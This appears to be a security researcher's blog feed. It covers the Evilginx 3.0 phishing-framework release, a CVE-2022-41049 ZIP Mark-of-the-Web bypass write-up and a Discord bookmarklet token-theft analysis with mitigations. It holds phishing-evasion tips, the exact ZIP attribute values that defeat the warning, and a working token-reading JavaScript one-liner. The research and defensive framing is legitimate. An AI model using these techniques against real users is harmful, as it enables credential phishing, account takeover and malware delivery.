It's a fact, that a lot of people have been struggling to figure out how to properly use Evilginx or create their own phishlets. Lack of official documentation to guides didn't help and you could only get so far, analyzing public phishlets and trying to figure out how they work through trial & error.

Additionally, to my surprise, during recent years, not many websites have attempted to develop their own detections for reverse proxy phishing. I need to actually hand it to Google and Microsoft as they seem to have been one of the few companies doing anything to protect their users against reverse proxy phishing.

All this will hopefully change today. Here is, in detail, what I've been working on, for the past year, and what I'm today releasing to the public:

Evilginx Mastery Course

Public version of Evilginx will always remain open-source and free to use. You can use the tool as you see fit. To fund further development, I decided to publish a paid online course, with which I could demonstrate my whole knowledge about Evilginx and share hands-on step by step video footage showing how I personally use Evilginx, myself.

Big thanks to SEKTOR7 and Rasta Mouse for encouragement to make an attempt in creating an Evilginx course.

The course is also prepared with defenders in mind. Seeing how little websites do to protect from reverse proxy phishing, nowadays, I've included tips on what defenders can do to make reverse proxy phishing attacks extremely hard or nearly impossible to pull off.

If you decide to purchase the course, thank you in advance and keep in mind that it helps me greatly to continue working on Evilginx and will definitely be a great contribution to my levels of motivation.

If you plan to purchase access to the course for multiple employees in your company, please contact me directly at [email protected] and we can work out a discount.

You can buy the course online and watch the lessons, at your own pace, whenever you want: Evilginx Mastery - Reverse Proxy MFA Phishing Guide For Red Teams

To know more about the course, take a look at my attempt to make a promotional video for the course. And yes I know how to blink :D

Evilginx 3.0

This version is not delivering flashy big features, but rather it serves as a quality-of-life update. I've fixed numerous issues, which have been lingering in Evilginx for a long time and updated some mechanics to make the tool work better than before.

GitHub: https://github.com/kgretzky/evilginx2

Here are some highlights of what has changed:

Improved TLS certificate management

I've ditched the old GO library for managing LetsEncrypt certificates and switched to well-maintained certmagic library. This change now allows to perform automated retrieval of TLS certificates, from LetsEncrypt, more efficiently and most importantly, Evilginx will now automatically renew expiring certificates, so you won't have to ever worry about your phishing campaigns expiring without warning.

Session tokens can now be extracted from response body or HTTP Headers

Ever since Evilginx was released, I've only considered a single scenario where session tokens are to be transmitted as HTTP cookies. Over the years, I've learned this approach was wrong, as now it is becoming more and more common for session tokens to be retrieved in JSON packets and later stored as LocalStorage values. This is now especially common practice with web applications relying heavily on JavaScript functionality like messenger applications.

It is now possible to look for session tokens in HTTP response packets body or in contents of HTTP headers like the Authorization header.

I've covered how to handle such scenario in one of the training labs from Evilginx Mastery course.

Example phishlets no longer available in main repository

My main goal has always been to deliver a reverse proxy phishing framework for red teamers. The provided example phishlets were always meant to serve as a learning material to learn how to make your own phishlets. Keeping them updated, was honestly an impossible feat. This is why I've made a decision to cease support for example phishlets in the main Evilginx repository.

Phishlets get outdated and stop working relatively fast and I always wanted to focus on developing the framework, rather then keeping the example phishlets constantly up-to-date. I encourage everyone to set up their own repositories with phishlets they want to share with the community. My priority now is to put effort into teaching people how to create their own phishlets.

Once I find several contributors, who may want to work on several phishlets for fun, I may set up a new repository just for aggregating several working and tested phishlets, made by others, and later have it integrated somehow with Evilginx installations.

Phishing pages can now be embedded within iframes

Few months ago, the legendary mr.d0x, released amazing research on BITB (browser-in-the-browser) phishing, where you could create a fake popup window, with JavaScript, showing a spoofed URL in fake address bar. I liked the idea so much that I really wanted to see it working with Evilginx.

Displaying phishing pages in iframes turned out to not be supported, by default. Now you can fully enjoy displaying your phishing page within iframes. Just make sure to fully rewrite the default BITB templates as they have been heavily flagged by Google as malicious content.

Also make sure to check out mr.d0x courses on Malware Development!

Configuration format changed to JSON

Evilginx configuration file was stored originally in YAML format. JSON, overall, is a much better option, with its syntax being easier to use than YAML, but maybe a bit harder to read. Nevertheless, with config file in JSON format, it will be easier to write custom deployment scripts, handling dynamic generation of configuration files.

Phishlets will remain in YAML format.

Phishing sessions are now created always when valid lure URL is opened

Evilginx would whitelist IP addresses of every target, making requests to valid lure URLs. This is required to later allow the proxying of requests, which cannot contain Evilginx session cookies, due to web browsers not allowing some requests to transmit cookies.

The bug in Evilginx would prevent creation of new reverse proxy sessions for valid lure URLs coming from IP addresses, which have already been whitelisted.

In 3.0 update, every time a target opens a valid lure URL, they will be assigned a new reverse proxy session. This fix will also make it possible to properly track the clicks to your lure URLs.

Child phishlets derived from phishlet templates

One of the problematic issues Evilginx users have encountered was targeting websites, which were hosted under customized hostnames.

Say you wanted to target a specific company's Okta portal, hosted on evilcorp.okta.com domain. To target custom domains, you'd have to manually edit the phishlet file and put the hardcoded evilcorp.okta.com into it.

With the phishlet templates feature, instead of having to modify a phishlet file manually, every time you'd need to target a different hostname, now you can create a phishlet template for Okta, setting up a placeholder for custom variables in your phishlet file e.g. {subdomain}.okta.com.

Having such template, whenever you'd need to target a specific hostname, you could just create a child phishlet as a derivative from your phishlet template and specify subdomain=evilcorp, as an example. Such created child phishlet can be then used as a normal phishlet with its own personalized setup.

You can learn how to create and use phishlet templates in my Evilginx Mastery course, as well.

URL redirection with JavaScript

Originally when all session tokens have been successfully captured, Evilginx would redirect the user to preconfigured redirect_url URL through HTTP Location header. I found this solution to not be ideal, since this approach exposed the phishing URL to destination website, through Referer header, when redirection took place.

Since 3.0, the redirection will happen via JavaScript injected into text/html content of the next web page, loaded after all session tokens have been captured. This approach will avoid populating the Referer header with your phishing URL. There is still one issue with redirecting the user if the website does not load any new pages after successful sign-in. This I will try to tackle in future updates.

License changed from GPL to BSD-3

In short - GPL requires to redistribute the tool with full source code. BSD-3 is more permissive, allowing to redistribute the tool without it.

Changelog

The full changelog for Evilginx 3.0 is as follows:

  • Feature: TLS certificates from LetsEncrypt will now get automatically renewed.
  • Feature: Automated retrieval and renewal of LetsEncrypt TLS certificates is now managed by certmagic library.
  • Feature: Authentication tokens can now be captured not only from cookies, but also from response body and HTTP headers.
  • Feature: Phishing pages can now be embedded inside of iframes.
  • Feature: Changed redirection after successful session capture from Location header redirection to injected Javascript redirection.
  • Feature: Changed config file from config.yaml to config.json, permanently changing the configuration format to JSON.
  • Feature: Changed open-source license from GPL to BSD-3.
  • Feature: Added always modifier for capturing authentication cookies, forcing to capture a cookie even if it has no expiration time.
  • Feature: Added phishlet <phishlet> command to show details of a specific phishlet.
  • Feature: Added phishlet templates, allowing to create child phishlets with custom parameters like pre-configured subdomain or domain. Parameters can be defined anywhere in the phishlet file as {param_name} and every occurence will be replaced with pre-configured parameter values of the created child phishlet.
  • Feature: Added phishlet create command to create child phishlets from template phishlets.
  • Feature: Renamed lure templates to lure redirectors due to name conflict with phishlet templates.
  • Feature: Added {orig_hostname} and {orig_domain} support for sub_filters phishlet setting.
  • Feature: Added {basedomain} and {basedomain_regexp} support for sub_filters phishlet setting.
  • Fixed: One target can now have multiple phishing sessions active for several different phishlets.
  • Fixed: Cookie capture from HTTP packet response will not stop mid-term, ignoring missing opt cookies, when all authentication cookies are already captured.
  • Fixed: trigger_paths regexp will now match a full string instead of triggering true when just part of it is detected in URL path.
  • Fixed: Phishlet table rows are now sorted alphabetically.
  • Fixed: Improved phishing session management to always create a new session when lure URL is hit if session cookie is not present, even when IP whitelist is set.
  • Fixed: WebSocket connections are now properly proxied.

Evilginx Online Documentation

As Evilginx kept growing it become harder and harder to keep up with all the features. GitHub Wiki kind of worked to, at least, provide documentation for the latest phishlet format, but I've never been fully satisfied with it.

I've always wanted the documentation to be easily accessible, well structured, easy to navigate and to have a quality look & feel. I can happily say, I may've found the perfect solution with Docusaurus.

Evilginx most up-to-date documentation, since today, will always be accessible through one official URL: https://help.evilginx.com

Check it out!

I honestly think, now with Evilginx having proper documentation, it will become much easier for everyone to use. I strongly hope you make good use of it! I'm often using it myself when I forget how the tool I made is supposed to work :P

Closing thoughts

The last 6 years have been a wild ride and I can't thank everyone enough for giving Evilginx a shot. I've never expected a tool, based on a simple idea, would eventually become a tool people use at work, to simulate phishing attacks. Mention of Evilginx even made it to TechCrunch, at one point.

I really hope Evilginx will continue to serve its purpose in aiding you during your phishing engagements. Thank you, again, and if you decide to give Evilginx Mastery course a try, accept my eternal gratitude!

To end with a cliffhanger, I will say that Evilginx story is not over and there may be Evilginx Pro in the works, with some special features I decided to keep private for now. The pro version will most likely be licensed only to cybersecurity companies. Some of you may find mentions about private features in the official online documentation.

For updates follow me on Twitter @mrgretzky and Mastodon @[email protected].

If you have any inquires about company discounts or if you require any custom functionality in Evilginx, you can always contact me directly at: [email protected].

As always - enjoy and stay tuned!

Evilginx 3.0 + Evilginx Mastery
Evilginx Mastery - Available NOW

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

8 November 2022 at 20:12
Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

In October 2022, I've come across a tweet from 5th July, from @wdormann, who reported a discovery of a new method for bypassing MOTW, using a flaw in how Windows handles file extraction from ZIP files.

So if it were a ZIP instead of ISO, would MotW be fine?
Not really. Even though Windows tries to apply MotW to extracted ZIP contents, it's really quite bad at it.
Without trying too hard, here I've got a ZIP file where the contents retain NO protection from Mark of the Web. pic.twitter.com/1SOuzfca5q

โ€” Will Dormann (@wdormann) July 5, 2022

This sounded to me like a nice challenge to freshen up my rusty RE skills. The bug was also a 0-day, at the time. It has already been reported to Microsoft, without a fix deployed for more than 90 days.

What I always find the most interesting about vulnerability research write-ups is the process on how one found the bug, what tools were used and what approach was taken. I wanted this post to be like this.

Now that the vulnerability has been fixed, I can freely publish the details.

Background

What I found out, based on public information about the bug and demo videos, was that Windows, somehow, does not append MOTW to files extracted from ZIP files.

Mark-of-the-web is really another file attached as an Alternate Data Stream (ADS), named Zone.Identifier, and it is only available on NTFS filesystems. The ADS file always contains the same content:

[ZoneTransfer]
ZoneId=3

For example, when you download a ZIP file file.zip, from the Internet, the browser will automatically add file.zip:Zone.Identifier ADS to it, with the above contents, to indicate that the file has been downloaded from the Internet and that Windows needs to warn the user of any risks involving this file's execution.

This is what happens when you try to execute an executable like a JScript file, through double-clicking, stored in a ZIP file, with MOTW attached.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Clearly the user would think twice before opening it when such popup shows up. This is not the case, though, for specially crafted ZIP files bypassing that feature.

Let's find the cause of the bug.

Identifying the culprit

What I knew already from my observation is that the bug was triggered when explorer.exe process handles the extraction of ZIP files. I figured the process must be using some internal Windows library for handling ZIP files unpacking and I was not mistaken.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

ProcessHacker revealed zipfldr.dll module loaded within Explorer process and it looked like a good starting point. I booted up IDA with conveniently provided symbols from Microsoft, to look around.

ExtractFromZipToFile function immediately caught my attention. I created a sample ZIP file with a packaged JScript file, for testing, which had a single instruction:

WScript.Echo("YOU GOT HACKED!!1");

I then added a MOTW ADS file with Notepad and filled it with MOTW contents, mentioned above:

notepad file.zip:Zone.Identifier

I loaded up x64dbg debugger, attached it to explorer.exe and set up a breakpoint on ExtractFromZipToFile. When I double-clicked the JS file, the breakpoint triggered and I could confirm I'm on the right path.

CheckUnZippedFile

One of the function calls I noticed nearby, revealed an interesting pattern in IDA. Right after the file is extracted and specific conditions are meet, CheckUnZippedFile function is called, followed by a call to _OpenExplorerTempFile, which opens the extracted file.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Having a hunch that CheckUnZippedFile is the function responsible for adding MOTW to extracted file, I nopped its call and found that I stopped getting the MOTW warning popup, when I tried executing a JScript file from within the ZIP.

It was clear to me that if I managed to manipulate the execution flow in such a way that the branch, executing this function is skipped, I will be able to achieve the desired effect of bypassing the creation of MOTW on extracted files. I looked into the function to investigate further.

I noticed that CheckUnZippedFile tries to combine the TEMP folder path with the zipped file filename, extracted from the ZIP file, and when this function fails, the function quits, skipping the creation of MOTW file.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Considering that I controlled the filename of the extracted ZIP file, I could possibly manipulate its content to trigger PathCombineW to fail and as a result achieve my goal.

PathCombineW turned out to be a wrapper around PathCchCombineExW function with output buffer size limit set to fixed value of 260 bytes. I thought that if I managed to create a really long filename or use some special characters, which would be ignored by the function handling the file extraction, but would trigger the length check in CheckUnZippedFile to fail, it could work.

I opened 010 Editor, which I highly recommend for any kind of hex editing work, and opened my sample ZIP file with a built-in ZIP template.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I spent few hours testing with different filename lengths, with different special characters, just to see if the extraction function would behave in erratic way. Unfortunately I found out that there was another path length check, called prior to the one I've been investigating. It triggered much earlier and prevented me from exploiting this one specific check. I had to start over and consider this path a dead end.

I looked if there are any controllable branching conditions, that would result in not triggering the call to CheckUnZippedFile at all, but none of them seemed to be dependent on any of the internal ZIP file parameters. I considered looking deeper into CheckUnZippedFile function and found out that when PathCombineW call succeeds, it creates a CAttachmentServices COM objects, which has its three methods called:

CAttachmentServices::SetReferrer(unsigned short const * __ptr64)
CAttachmentServices::SetSource(unsigned short const * __ptr64)
CAttachmentServices::SaveWithUI(struct HWND__ * __ptr64)

I realized I am about to go deep down a rabbit hole and I may spend there much longer than a hobby project like that should require. I had to get a public exploit sample to speed things up.

Huge thanks you @bohops & @bufalloveflow for all the help in getting the sample!

Detonating the live sample

I managed to copy over all relevant ZIP file parameters from the obtained exploit sample into my test sample and I confirmed that MOTW was gone, when I extracted the sample JScript file.

I decided to dig deeper into SaveWithUI COM method to find the exact place where creation of Zone.Identifier ADS fails. Navigating through shdocvw.dll, I ended up in urlmon.dll with a failing call to WritePrivateProfileStringW.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

This is the Windows API function for handling the creation of INI configuration files. Considering that Zone.Identifier ADS file is an INI file containing section ZoneTransfer, it was definitely relevant. I dug deeper.

The search led me to the final call of NtCreateFile, trying to create the Zone.Identifier ADS file, which failed with ACCESS_DENIED error, when using the exploit sample and succeeded when using the original, untampered test sample.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

It looked like the majority of parameters were constant, as you can see on the screenshot above. The only place where I'd expect anything dynamic was in the structure of ObjectAttributes parameter. After closer inspection and half an hour of closely comparing the contents of the parameter structures from two calls, I concluded that both failing and succeeding calls use exactly the same parameters.

This led me to realize that something had to be happening prior to the creation of the ADS file, which I did not account for. There was no better way to figure that out than to use Process Monitor, which honestly I should've used long before I even opened IDA ๐Ÿ˜›.

Backtracking

I set up my filters to only list file operations related to files extracted to TEMP directory, starting with Temp prefix.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

The test sample clearly succeeded in creating the Zone.Identifier ADS file:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

While the exploit sample failed:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Through comparison of these two listings, I could not clearly see any drastic differences. I exported the results as text files and compared them in a text editor. That's when I could finally spot it.

Prior to creating Zone.Identifier ADS file, the call to SetBasicInformationFile was made with FileAttributes set to RN.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I looked up what was that R attribute, which apparently is not set for the file when extracting from the original test sample and then...

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
Facepalm

The R file attribute stands for read-only. The file stored in a ZIP file has the read-only attribute set, which is set also on the file extracted from the ZIP. Obviously when Windows tries to attach the Zone.Identifier ADS, to it, it fails, because the file has a read-only attribute and any write operation on it will fail with ACCESS_DENIED error.

It doesn't even seem to be a bug, since everything is working as expected ๐Ÿ˜›. The file attributes in a ZIP file are set in ExternalAttributes parameter of the ZIPDIRENTRY structure and its value corresponds to the ones, which carried over from MS-DOS times, as stated in ZIP file format documentation I found online.

   4.4.15 external file attributes: (4 bytes)

       The mapping of the external attributes is
       host-system dependent (see 'version made by').  For
       MS-DOS, the low order byte is the MS-DOS directory
       attribute byte.  If input came from standard input, this
       field is set to zero.

   4.4.2 version made by (2 bytes)

        4.4.2.1 The upper byte indicates the compatibility of the file
        attribute information.  If the external file attributes 
        are compatible with MS-DOS and can be read by PKZIP for 
        DOS version 2.04g then this value will be zero.  If these 
        attributes are not compatible, then this value will 
        identify the host system on which the attributes are 
        compatible.  Software can use this information to determine
        the line record format for text files etc.  

        4.4.2.2 The current mappings are:

         0 - MS-DOS and OS/2 (FAT / VFAT / FAT32 file systems)
         1 - Amiga                     2 - OpenVMS
         3 - UNIX                      4 - VM/CMS
         5 - Atari ST                  6 - OS/2 H.P.F.S.
         7 - Macintosh                 8 - Z-System
         9 - CP/M                     10 - Windows NTFS
        11 - MVS (OS/390 - Z/OS)      12 - VSE
        13 - Acorn Risc               14 - VFAT
        15 - alternate MVS            16 - BeOS
        17 - Tandem                   18 - OS/400
        19 - OS X (Darwin)            20 thru 255 - unused

        4.4.2.3 The lower byte indicates the ZIP specification version 
        (the version of this document) supported by the software 
        used to encode the file.  The value/10 indicates the major 
        version number, and the value mod 10 is the minor version 
        number.  

Changing the value of external attributes to anything with the lowest bit set e.g. 0x21 or 0x01, would effectively make the file read-only with Windows being unable to create MOTW for it, after extraction.

Conclusion

I honestly expected the bug to be much more complicated and I definitely shot myself in the foot, getting too excited to start up IDA, instead of running Process Monitor first. I started with IDA first as I didn't have an exploit sample in the beginning and I was hoping to find the bug, through code analysis. Bottom line, I managed to learn something new about Windows internals and how extraction of ZIP files is handled.

As a bonus, Mitja Kolsek from 0patch asked me to confirm if their patch worked and I was happy to confirm that it did!

Nice work. Care to verify that our micropatches fix this? (A free 0patch account suffices.) https://t.co/us8FVWczXk

โ€” Mitja Kolsek (@mkolsek) November 1, 2022

The patch was clean and reliable as seen in the screenshot from a debugger:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I've been also able to have a nice chat with Will Dormann, who initially discovered this bug, and his story on how he found it is hilarious:

I merely wanted to demonstrate how an exploit in a ZIP was safer (by way of prompting the user) than that *same* exploit in an ISO. ย So how did I make the ZIP? ย I:
1) Dragged the files out of the mounted ISO
2) Zipped them. That's it. ย The ZIP contents behaved the same as the ISO.

Every mounted ISO image is listing all files in read-only mode. Drag & dropping files from read-only partition, to a different one, preserves the read-only attribute set for created files. This is how Will managed to unknowingly trigger the bug.

Will also made me realize that 7zip extractor, even though having announced they began to add MOTW to every file extracted from MOTW marked archive, does not add MOTW by default and this feature has to be enabled manually.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I mentioned it as it may explain why MOTW is not always considered a valid security boundary. Vulnerabilities related to it may be given low priority and be even ignored by Microsoft for 90 days.

When 7zip announced support for MOTW in June, I honestly took for granted that it would be enabled by default, but apparently the developer doesn't know exactly what he is doing.

I haven't yet analyzed how the patch made by Microsoft works, but do let me know if you did and I will gladly update this post with additional information.

Hope you enjoyed the write-up!

Hacked Discord - Bookmarklet Strikes Back

31 August 2022 at 10:00
Hacked Discord - Bookmarklet Strikes Back

For the past couple of months, I've been hearing about increasing numbers of account takeover attacks in the Discord community. Discord has somehow become a de facto official messenger application among the cryptocurrency community, with new channels oriented around NFTs, popping up like mushrooms.

Hacking Discord accounts has suddenly become a very lucrative business for cybercriminals, who are going in for the kill, to make some easy money. They take over admin accounts in cryptocurrency-oriented communities to spread malware and launch further social engineering attacks. My focus is going to be purely on Discord account security, which should be of concern to everyone using Discord.

In recent weeks I thought the attackers are using some new reverse-proxy phishing techniques to hijack WebSocket sessions with similar tools to Evilginx, but in reality the hacks, I discovered, are much easier to execute than I anticipated.

In this post I will be explaining how the attacks work, what everyone can do to protect themselves and more importantly what Discord can do to mitigate such attacks.

Please bear in mind that this post covers my personal point of view on how I feel the mitigations should be implemented and I am well aware that some of you may have much better ideas. I encourage you to contact me @mrgretzky or at [email protected] if you feel I missed anything or was mistaken.

Criticism is welcomed!

The Master Key

When you log in to your Discord account, either by entering your account credentials on the login screen, or by scanning a QR code with your Discord mobile app, Discord will send you your account token, in form of a string of data.

This token is the only key required to access your Discord account.

From now on I will refer to that token as the master token, since it works like a master key for your Discord account. That single line of text, consisting of around 70 characters, is what the attackers are after. When they manage to extract the master token from your account, it is game over and third parties can now freely access your account, bypassing both the login screen and any multi-factor authentication you may've set up.

Now that we know what the attackers are after, let's analyze the attack flow.

Deception Tactics

Attacker's main goal is to convince you in any way possible to reveal your account token, with the most likely approach being social engineering. First, attackers will create a story to set themselves up as a people you can trust, who will resolve your pressing issue, like unban your account on a Discord channel or elevate your community status.

There is a hack/scam(bypasses 2fa) that scammers are using to compromise discord accounts. If you are a project founder/admin, this is IMPORTANT.

Our server just got attacked.

Here's how, a๐Ÿงต

โ€” Little Lemon Friends (@LittlelemonsNFT) January 3, 2022

In this thread you can read how attackers managed to convince the target to do a screen share from their computer with Chrome DevTools opened, on the side. DevTools allowed them to extract the master token, through revealing the contents of Discord's LocalStorage.

Discord now purposefully renames the window.localStorage object, when it loads, to make it inaccessible to injected JavaScript. It also hides the token variable, containing the master token's value, from the storage. This was done to prevent attackers from stealing master tokens, by convincing the targets to open LocalStorage through screen share.

Discord also shows a pretty warning, informing users about the risks of pasting unknown code into the DevTools console.

Hacked Discord - Bookmarklet Strikes Back

The renaming of localStorage object and concealment of token variable did not fix the issue. Attackers figured out they can force Discord window to reload and then retrieve the data before implemented mitigations are executed.

This is exactly how the most recent bookmarklet attack works. Attackers convince their victim to bookmark JavaScript code in their bookmarks tab and trick them later to click the saved bookmark, with Discord app in focus, to execute attacker's malicious code.

Attacker's code retrieves the victim's Discord master token and sends it to the attacker.

Hacked Discord - Bookmarklet Strikes Back
Saved malicious bookmarklet would look like this.

The malicious JavaScript to access the master token looks like this:

javascript:(function(){location.reload();var i = document.createElement('iframe');document.body.appendChild(i);alert(i.contentWindow.localStorage.token)})()

To try it out, open Discord website, go to the console tab in Chrome DevTools (Control+Shift+I) and paste this code into it, which is something you should never do when asked ๐Ÿ˜‰. After you press Enter, you should see the popup box with your master token value in it.

Attackers will exfiltrate the token through Discord WebHooks. This is done to bypass current Content Security Policy rules as obviously discord.com domain is allowed to be connected to from Discord client.

Most users have no idea that saved bookmarks can run malicious JavaScript in context of the website they are currently viewing. This is why this type of attack may be successful among even the security savvy users.

Another much harder approach, the attackers can take, is deploying malware onto target computer. Once you install malware on your PC the consequences can be far greater than just losing your Discord account. Just wanted to make note here that browser's LocalStorage will store the tokens in unencrypted form.

LocalStorage database files for Chrome reside in:

%LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Local Storage\leveldb\
Hacked Discord - Bookmarklet Strikes Back
Discord master token found inside one of the LocalStorage database files

Once the attacker retrieves your Discord master token, they can inject it into their browser's LocalStorage, with token as a variable name. It can easily be done using LocalStorage Manager extension for Chrome.

Discord on reload will detect the valid token in its LocalStorage and allow full control over the hijacked account. All this is possible even with multi-factor authentication enabled on hijacked account.

Proposed Mitigations

The fact that a single token, accessible through JavaScript, lets you impersonate and fully control another user's account is what makes the bookmarklet attack possible.

The attacker needs to execute their malicious JavaScript in context of the user's Discord session. This can happen either through exploitation of an XSS vulnerability or by tricking a user into bookmarking and clicking the JavaScript bookmarklet.

There is unfortunately no definitive fix to this problem, but there are definitely ways to increase the costs for attackers and make the attacks much harder to execute.

Store Token as an HttpOnly Cookie

Modern web services rely heavily on communication with REST APIs and Discord is no different. REST APIs, to conform with the standard, must implement a stateless architecture, meaning that each request from the client to the server must contain all of the information necessary to understand and complete the request.

The session token, included with requests to REST API, is usually embedded within the Authorization HTTP header. We can see that Discord app does it the same way:

Hacked Discord - Bookmarklet Strikes Back
Master token sent via Authorization HTTP header

For the web application to be able to include the session token within the Authorization header or request body, the token value itself must be accessible through JavaScript. Token accessible through JavaScript will be always vulnerable to XSS bugs or other JavaScript injection attacks (like bookmarklets).

Some people may not agree with me, but I think that critical authorization tokens should be handled through cookie storage, inaccessible to JavaScript. Support for Authorization header server-side can also be allowed, but it should be optional. For reasons unknown to me, majority of REST API developers ignore token authorization via cookies altogether.

Server should be sending the authorization session token value as a cookie with HttpOnly flag, in Set-Cookie HTTP header.

Storing the session token with HttpOnly flag, in the browser, will make sure that the cookie can never be retrieved from JavaScript code. The session token will be automatically sent with every HTTP request to domains, the cookie was set up for.

The request, which sends authentication token as a cookie, could look like this:

Hacked Discord - Bookmarklet Strikes Back
How Discord may be sending the session token via cookies, instead of Authorization header

I've noticed that Discord's functionality does not rely solely on interaction with its API, but the major part of its functionality is handled through WebSocket connections.

The WebSocket connection is established with gateway.discord.gg endpoint, instead of the main discord.com domain.

Hacked Discord - Bookmarklet Strikes Back
Discord initiating a WebSocket connection

If the session token cookie was delivered as a response to request delivered to domain discord.com, it would not be possible to set a cookie for domain discord.gg due to security boundaries.

To counter that, Discord would either need to implement some smart routing allowing Discord clients to use WebSocket connections through discord.com domain or it would have to implement authorization using one-time token with discord.gg endpoint, once the user successfully logs in, to have discord.gg ย return a valid session token as a cookie, for its own domain.

Right now Discord permits establishing WebSocket connection through gateway.discord.gg to anyone and the authorization token validation happens during internal WebSocket messages exchange.

This means that the session token is also required during WebSocket communication, increasing its reliance on being accessible through JavaScript. This brings me to another mitigation that can be implemented.

Ephemeral Session Tokens

Making a strict requirement for tokens to be delivered as HttpOnly cookies, will never work. There needs to be some way to have authorization tokens accessible to JavaScript and not give the attacker all the keys to the castle once that token gets compromised.

That's why I'd make authentication reliant on two types of tokens:

  1. Authentication token stored only as a cookie with HttpOnly flag, which will be used to authenticate with REST API and to initiate a WebSocket connection.
  2. Session token generated dynamically with short expiration time (few hours), accompanied by a refresh token used for creating new session tokens. Session tokens will be used only in internal WebSocket communication. WebSocket connections will allow to be established only after presenting a valid authentication token as a cookie.

If you wish to learn more about ephemeral session tokens and refresh tokens, I recommend this post.

But, wait! Attacker controls the session anyway!

Before you yell at me about all of these mitigations being futile, because the attacker, with his injected JavaScript, is already able to fully impersonate and control the hacked user session, hear me out.

Me and @buherator exchanged opinions about possible mitigations and he made a good point:

I don't see how this would make a difference. The app needs to maintain long term sessions, thus the attacker in control of the app can have them too (if she can't achive her goal in millis). Having to request new tokens periodically is an implementation nuance.

โ€” buherator (@buherator) August 27, 2022

In short - the attacker is able to inject their own JavaScript, which will work in context of the Discord app. Running malicious code in context of Discord allows the attacker to make any request to Discord API, with all required security tokens attached. This also includes cookies stored with HttpOnly flag, since attacker's requests can have them included automatically with withCredentials set to true:

var req = new XmlHttpRequest();
req.open("GET", โ€œhttp://discord.com/api/v9/do_somethingโ€, true);
req.withCredentials = true;
req.send(null);
How attacker could be able to make HTTP requests to Discord API with valid authentication cookies.

No matter how well the tokens are protected, Discord client needs access to all of them, which means attacker executing code, in context of the app, will be able to forge valid client requests, potentially being able to change user's settings or sending spam messages to subscribed channels.

I've been thinking about it for few days and reached a conclusion that implementing the mitigations I mentioned would still be worth it. At the moment the attack is extremely easy to pull off, which is what makes it so dangerous. Ability to forge packets, impersonating a target user is not as bad as being able to completely recreate victim's session within a Discord client remotely.

With token cookie protected with HttpOnly flag, the attacker will only be able to use the token to perform actions, impersonating the hacked user, but they will never be able to exfiltrate the token's value, in order to inject it into their own browser.

In my opinion this will still vastly lower the severity of the attack and will force the attackers to increase the complexity of the attack in technical terms, requiring knowledge of Discord API, in order to perform the attacker's tasks, once the user's session is hijacked.

Another thing to note here is that the attacker will remain in charge of the user's hijacked session only until the Discord app is closed or reloaded. They will not be able to spawn their own session to freely impersonate the hacked user at any time they want. Currently the stolen master token gives the attacker lifetime access to victim's account. Token is invalidated and recreated only when user changes their password.

Takeaways

It is important to note that the attackers are only able to exfiltrate the master token value, using XMLHttpRequest and Discord's Webhooks, by sending it to Discord channels they control. Using WebHooks allows them to comply with Discord's Content Security Policy.

If it weren't for WebHooks, attackers would have to figure out another way to exfiltrate the stolen tokens. At the time of writing the article, the connect-src CSP rules for discord.com, which tell the browser the domains it should only allow Discord app to connect to, are as follows:

connect-src 'self' https://discordapp.com https://discord.com https://connect.facebook.net https://api.greenhouse.io https://api.github.com https://sentry.io https://www.google-analytics.com https://hackerone-api.discord.workers.dev https://*.hcaptcha.com https://hcaptcha.com https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location ws://127.0.0.1:* http://127.0.0.1:*;

There seem to be other services allowed, which could be used to exfiltrate the tokens through them, like GitHub API, Sentry or Google Analytics.

Not sure if Discord client needs access to WebHooks through XMLHttpRequest, but if it doesn't, it may've been a better choice for Discord to host WebHook handlers on a different domain than discord.com and control access to them with additional CSP rules.

There is also one question, which remains unanswered:

Should web browsers still support bookmarklets?

As asked by @zh4ck in his tweet, which triggered my initial curiosity about the attacks.

Bookmarklets were useful in the days when it was convenient to click them to spawn an HTML popup for quickly sharing the URL on social media. These days I'm not sure if anyone still needs them.

I have no idea if letting bookmarks start with javascript: is needed anymore, but it can easily become one of those legacy features that will keep coming back to haunt us.

Wrap-up

I hope you liked the post and hopefully it managed to teach you something.

I am constantly looking for interesting projects to work on. If you think my skills may be of help to you, do reach out, through the contact page.

Until next time!

References

Evilginx 2.4 - Gone Phishing

14 September 2020 at 11:37
Evilginx 2.4 - Gone Phishing

Welcome back everyone! I can expect everyone being quite hungry for Evilginx updates! I am happy to announce that the tool is still kicking.

It's been a while since I've released the last update. This blog tells me that version 2.3 was released on January 18th 2019. One and a half year is enough to collect some dust.

I'll make sure the wait was worth it.

First of all, I wanted to thank all you for invaluable support over these past years. I've learned about many of you using Evilginx on assessments and how it is providing you with results. Such feedback always warms my heart and pushes me to expand the project. It was an amazing experience to learn how you are using the tool and what direction you would like the tool to expand in. There were some great ideas introduced in your feedback and partially this update was released to address them.

I'd like to give out some honorable mentions to people who provided some quality contributions and who made this update happen:

>> GET EVILGINX HERE <<


Special Thanks!

Julio @juliocesarfort - For constantly proving to me and himself that the tool works (sometimes even too well)!

OJ Reeves @TheColonial - For constant great source of Australian positive energy and feedback and also for being always humble and a wholesome and awesome guy! Check out OJ's live hacking streams on Twitch.tv and pray you're not matched against him in Rocket League!

